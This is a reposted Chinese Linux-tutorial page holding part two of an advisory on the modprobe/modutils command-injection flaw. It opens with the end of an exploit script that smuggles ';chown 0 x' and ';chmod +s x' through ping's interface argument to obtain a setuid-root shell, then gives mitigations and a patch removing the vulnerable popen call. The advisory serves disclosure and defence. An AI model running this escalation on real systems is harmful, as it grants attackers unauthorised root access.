Linux教程網 >> Linux基礎 >> Linux教程 >> Linuxmodprobe執行任意命令漏洞（二）

Linuxmodprobe執行任意命令漏洞（二）

日期：2017/2/25 10:38:22 编辑：Linux教程

　　_eof_

　　gcc /x.c -o /x

　　chmod 755 /x

　　echo "Phase 3: chown+chmod on our helper application..."

　　$PING -I ';chown 0 x' 195.117.3.59 &>/dev/null

　　sleep 1

　　$PING -I ';chmod +s x' 195.117.3.59 &>/dev/null

　　sleep 1

　　if [ ! -u /x ]; then

　　echo "Apparently, this is not exploitable on this system :("

　　exit 1

　　echo "Voila! Entering rootshell..."

　　echo "Thank you."

　　--------------------------------------------------------------------------

　　建議：

　　臨時解決辦法：

　　NSFOCUS建議您暫時去掉有問題的系統的ping的suid屬性

　　廠商補丁：

　　1. 升級到GNU Linux modutils 2.3.11，它解決了這個問題

　　2. Keith Owens 提供了如下補丁：

　　GNU Linux modutils 2.3.9:

　　Index: 19.7/util/meta_expand.c

　　--- 19.7/util/meta_expand.c Sun, 10 Sep 2000 12:56:40 +1100 kaos (modutils-2.3/10_meta_expan 1.4 644)

　　+++ 19.7(w)/util/meta_expand.c Mon, 13 Nov 2000 21:19:41 +1100 kaos (modutils-2.3/10_meta_expan 1.4 644)

　　@@ -156,12 +156,8 @@ static int glob_it(char *pt, GLOB_LIST *

　　int meta_expand(char *pt, GLOB_LIST *g, char *base_dir, char *version)

　　{

　　- FILE *fin;

　　- int len = 0;

　　- char *line = NULL;

　　char *p;

　　char tmpline[PATH_MAX + 1];

　　- char tmpcmd[PATH_MAX + 11];

　　g->pathc = 0;

　　g->pathv = NULL;

　　@@ -277,38 +273,6 @@ int meta_expand(char *pt, GLOB_LIST *g,

　　/* Only "=" remaining, should be module options */

　　split_line(g, pt, 0);

　　return 0;

　　- }

　　- /*

　　- * Last resort: Use "echo"

　　- */

　　- sprintf(tmpline, "%s%s", (base_dir ? base_dir : ""), pt);

　　- sprintf(tmpcmd, "/bin/echo %s", tmpline);

　　- if ((fin = popen(tmpcmd, "r")) == NULL) {

　　- error("Can't execute: %s", tmpcmd);

　　- return -1;

　　- }

　　- /* else */

　　- /*

　　- * Collect the result

　　- */

　　- while (fgets(tmpcmd, PATH_MAX, fin) != NULL) {

　　- int l = strlen(tmpcmd);

　　- line = (char *)xrealloc(line, len + l + 1);

　　- line[len] = '\0';

　　- strcat(line + len, tmpcmd);

　　- len += l;

　　- }

　　- pclose(fin);

　　- if (line) {

　　- /* Ignore result if no expansion occurred */

　　- strcat(tmpline, "\n");

　　- if (strcmp(tmpline, line))

　　- split_line(g, line, 0);

　　- free(line);

　　}

　　return 0;

上一頁:Linuxmodprobe執行任意命令漏洞（三）
下一頁:Linuxmodprobe執行任意命令漏洞（一）

Linux教程

openstack創建實例的流程

workflow: 1. 用戶向nova-api發送請求用戶發送請

Linux入門教程(精華基礎版)（121）

Ubuntu 技巧之關閉登錄與注銷提示音

我的Ubuntu 8.10個性配置完全方案

Ubuntu下ECshop目錄和文件的權限設置

如何通過命令行為Linux安裝驅動程序

Linux操作系統學習筆記權限管理（2）

Ubuntu系統監測工具

Linux非root用戶下安裝了python及MySQLdb

Linux教程網

Linux下清除文件中的隱私數據的方法

　　我們平時創建的文件、圖片都包含著很多信息，很容易被人利用，所以要清除

Linux 安全設置手冊

我的Ubuntu7.04主題應用小記

linux上使用linux at命令定時啟動程序

通過PPA源在Ubuntu中安裝截圖軟件：Shutter

了解你的敵人

ConfigHOWTO系統設置(2)

Nginx重新編譯添加模塊

Redhat Linux 學習筆記 (一)

Linux基礎知識 Linux入門 Linux技術 Linux教程 Linux服務器關於Linux

文章推荐

Hadoop I/O系統介紹

深入理解PHP Opcode緩存原理

如何在桌面版Ubuntu中用命令行更改系統代理設置

Nodejs負載均衡：haproxy，slb以及node-slb

热点聚焦

cobbler 主機自動化部署

Dell R710 + RedHat AS 5.4 X64 網卡驅動升級可遠程無需重啟

一切從基礎開始Linux入門命令篇

Linux 相對路徑與絕對路徑

ubuntu下VirtualBox安裝WindowsXP實例記錄

Linux分區工具和Fdisk使用方法

Unix系統中LVM硬盤管理的好幫手

XP下安裝小芭比Linux(Puppy Linux)全程圖解

Linux系統入門教程：如何找出Linux中內置模塊的信息

Fedora 10進程表（開發計劃）